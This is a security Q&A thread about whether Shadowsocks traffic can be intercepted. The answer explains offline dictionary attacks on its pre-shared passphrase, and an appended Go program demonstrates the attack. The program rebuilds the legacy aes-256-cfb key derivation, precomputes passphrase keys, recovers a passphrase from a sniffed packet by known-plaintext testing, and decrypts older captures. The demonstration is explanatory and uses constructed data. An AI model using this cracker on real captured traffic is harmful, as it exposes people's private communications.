
Shadowsocks is a secure SOCKS5 proxy which utilises various ciphers (default AES-256-cfb) to protect the traffic in transit.

Shadowsocks uses symmetric encryption and, according to the site, the server provides no messages back to the client if the shared secret is incorrect.

Therefore if my ISP wanted to perform an MITM attack they would need to compile a new version of Shadowsocks that accepts any shared secret (since they don't know what my shared secret is) and then spoof the IP of the original server I was connecting to, thereby capturing my traffic.

Is my thinking correct? Does this mean that all symmetrically encrypted network streams are MITM-able?

Hilton D
  • No, because symmetric encryption is only used when both parties have agreed upon a shared secret. – Yorick de Wid Aug 28 '16 at 12:43
  • Yes, both parties have agreed on a pre-shared secret. The client is not aware if the password is incorrect... perhaps I don't understand the internals enough to understand, but any help for my understanding would be appreciated. – Hilton D Aug 28 '16 at 13:09

1 Answer


... need to compile a new version of Shadowsocks that accepts any shared secret (since they don't know what my shared secret is) and then spoof the IP of the original server I was connecting to, thereby capturing my traffic.

There is no such thing as "accept any shared secret" by the server. The secret is not transferred inside the connection; it is a pre-shared secret, i.e. client and server are configured with this secret, and only after this is done can the first connection be established.

Thus the ISP can only MITM the connection if he gets access to the secret, either by hacking into client or server or by brute-forcing. From a look at the Python source code, brute-forcing is not that impossible in my opinion, since the ISP can easily know some plaintext data (web requests and responses have a typical structure) and can pre-build a dictionary of passphrase to encryption key to speed up the cracking, since the same passphrase always results in the same encryption key.

Steffen Ullrich
  • Which is why Shadowsocks is not good as a VPN. It was designed to bypass firewalls – Yorick de Wid Aug 28 '16 at 13:35
  • Thanks for your answers. How can I gauge how long it would take to brute-force? If I use a sufficiently long & random password (48 random chars) are we talking weeks / months / years / lifetimes to crack it? – Hilton D Sep 04 '16 at 13:28
  • @HiltonD: this depends on how much resources your enemy is investing :). But if your password is that long and really random there is probably only brute force possible which is really expensive in terms of time. In this case you are probably safe for lots of years. But also note that the security of the system fully depends on this password. If your enemies manage to get it (hack the server or [the brutal way](https://xkcd.com/538/)) they can decrypt even old communication they might have sniffed. TLS with forward secrecy ciphers is much better in this regard. – Steffen Ullrich Sep 04 '16 at 13:37
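The answer's two points (a passphrase-to-key dictionary can be precomputed because the key derivation is deterministic, and known plaintext structure lets a sniffer test candidate keys offline) and the follow-up comment about the lack of forward secrecy can be shown end to end. The Go program below is an added example written for this page; it is not code from the Shadowsocks project. It reconstructs the legacy stream-cipher framing of an aes-256-cfb session (a 16-byte IV followed by the CFB stream, whose first plaintext bytes are the SOCKS-style address header) and the OpenSSL EVP_BytesToKey-style MD5 key derivation that the stream ciphers used. The wordlist, the passphrase "hunter2", the fixed IVs and the captured packets are constructed for the demonstration; a real client picks the IV at random, which changes nothing about the attack.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/md5"
	"encoding/binary"
	"fmt"
)

const keyLen, ivLen = 32, 16 // aes-256-cfb

// DeriveKey: EVP_BytesToKey with MD5, no salt, one round. The key depends
// only on the passphrase, so passphrase->key can be tabulated once, offline.
func DeriveKey(password string) []byte {
	var key, prev []byte
	for len(key) < keyLen {
		h := md5.Sum(append(append([]byte{}, prev...), password...))
		prev = h[:]
		key = append(key, prev...)
	}
	return key[:keyLen]
}

// DomainHeader encodes the ATYP=0x03 (domain name) address header.
func DomainHeader(host string, port uint16) []byte {
	h := append([]byte{0x03, byte(len(host))}, host...)
	p := make([]byte, 2)
	binary.BigEndian.PutUint16(p, port)
	return append(h, p...)
}

// ClientHello builds the first client packet: IV || CFB(key, IV, header||payload).
func ClientHello(password string, iv, header, payload []byte) ([]byte, error) {
	block, err := aes.NewCipher(DeriveKey(password))
	if err != nil {
		return nil, err
	}
	pt := append(append([]byte{}, header...), payload...)
	ct := make([]byte, len(pt))
	cipher.NewCFBEncrypter(block, iv).XORKeyStream(ct, pt)
	return append(append([]byte{}, iv...), ct...), nil
}

// DecryptWithKey opens a captured packet. There is no per-session secret, so
// one recovered key opens every capture ever made against that server.
func DecryptWithKey(key, packet []byte) ([]byte, error) {
	if len(packet) < ivLen {
		return nil, fmt.Errorf("packet shorter than IV")
	}
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	pt := make([]byte, len(packet)-ivLen)
	cipher.NewCFBDecrypter(block, packet[:ivLen]).XORKeyStream(pt, packet[ivLen:])
	return pt, nil
}

// HeaderLen validates the address header and returns its length.
func HeaderLen(pt []byte) (int, bool) {
	if len(pt) == 0 {
		return 0, false
	}
	switch pt[0] {
	case 0x01: // IPv4 + port
		return 7, len(pt) >= 7
	case 0x04: // IPv6 + port
		return 19, len(pt) >= 19
	case 0x03: // length-prefixed host name + port
		if len(pt) < 2 || pt[1] == 0 || len(pt) < 4+int(pt[1]) {
			return 0, false
		}
		for _, c := range pt[2 : 2+int(pt[1])] {
			if !(c == '.' || c == '-' || c >= '0' && c <= '9' || c >= 'a' && c <= 'z' || c >= 'A' && c <= 'Z') {
				return 0, false
			}
		}
		return 4 + int(pt[1]), true
	}
	return 0, false
}

// KnownPlaintext is the structure test: well-formed header, then something
// that looks like an HTTP request line or a TLS ClientHello record.
func KnownPlaintext(pt []byte) bool {
	n, ok := HeaderLen(pt)
	if !ok {
		return false
	}
	for _, p := range [][]byte{[]byte("GET "), []byte("POST "), []byte("HEAD "), []byte("CONNECT "), {0x16, 0x03}} {
		if bytes.HasPrefix(pt[n:], p) {
			return true
		}
	}
	return false
}

// BuildKeyTable precomputes the expensive part independently of any capture.
func BuildKeyTable(words []string) map[string][]byte {
	t := make(map[string][]byte, len(words))
	for _, w := range words {
		t[w] = DeriveKey(w)
	}
	return t
}

// Crack tries every tabulated key against one sniffed first packet.
func Crack(packet []byte, table map[string][]byte) (string, bool) {
	for w, k := range table {
		if pt, err := DecryptWithKey(k, packet); err == nil && KnownPlaintext(pt) {
			return w, true
		}
	}
	return "", false
}

func main() {
	words := []string{"password", "letmein", "shadowsocks", "hunter2", "qwerty"} // constructed wordlist
	pkt, _ := ClientHello("hunter2", bytes.Repeat([]byte{0x42}, ivLen), DomainHeader("example.com", 80), []byte("GET / HTTP/1.1\r\n"))
	if w, ok := Crack(pkt, BuildKeyTable(words)); ok {
		fmt.Printf("passphrase recovered: %q\n", w)
		old, _ := ClientHello("hunter2", bytes.Repeat([]byte{0x07}, ivLen), DomainHeader("example.com", 443), []byte{0x16, 0x03, 0x01})
		pt, _ := DecryptWithKey(DeriveKey(w), old)
		fmt.Printf("older capture with another IV opens too: %x\n", pt[:3])
	}
}
```

The point of splitting BuildKeyTable from Crack is the one the answer makes: the MD5 chain is the only non-trivial work, and it can be done before the first packet is ever captured. A long random passphrase defeats the dictionary but not the model; once the key is known, DecryptWithKey opens the "older" packet as easily as the new one, which is the forward-secrecy gap the comment contrasts with TLS.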